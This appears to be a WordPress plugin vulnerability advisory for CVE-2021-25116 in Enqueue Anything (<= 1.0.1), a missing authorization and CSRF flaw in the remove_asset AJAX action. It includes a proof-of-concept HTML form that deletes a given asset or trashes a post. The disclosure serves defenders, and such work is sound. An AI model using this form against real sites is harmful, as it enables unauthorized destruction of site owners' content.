WordPress Plugin Vulnerabilities

Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion

Description

The plugin does not have authorisation and CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low privilege users such as subscriber could delete arbitrary assets, as well as put arbitrary posts in the trash.

v1.0.1 added a check to ensure post to be removed is an asset. However the plugin is still missing capability and CSRF checks

Proof of Concept

As a subscriber, or via CSRF against any authenticated user
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="remove_asset" />
      <input type="hidden" name="id" value="289" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
enqueue-anything
No known fix

References

CVE
CVE-2021-25116

Classification

Type
NO AUTHORISATION
OWASP top 10
A5: Broken Access Control
CWE
CWE-862
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
abhishek bhoir
Submitter
abhishek bhoir
Verified
Yes
WPVDB ID
140a15b6-12c8-4f03-a877-3876db866852

Timeline

Publicly Published
2022-05-17 (about 1 years ago)
Added
2022-05-17 (about 1 years ago)
Last Updated
2022-05-18 (about 1 years ago)

Other

Published
Title
Published
2023-01-24
Title
Intuitive Custom Post Order < 3.1.4 - Subscriber+ Arbitrary Menu Order Update
Published
2023-11-16
Title
Live Preview for Contact Form 7 <= 1.2.0 - Missing Authorization via update_option
Published
2024-04-25
Title
Knowledge Base documentation & wiki plugin – BasePress < 2.16.2.1 - Missing Authorization
Published
2024-03-04
Title
Change Memory Limit <= 1.0 - Missing Authorization via admin_logic()
Published
2022-02-14
Title
Smart Forms < 2.6.71 - Subscriber+ Form Data Download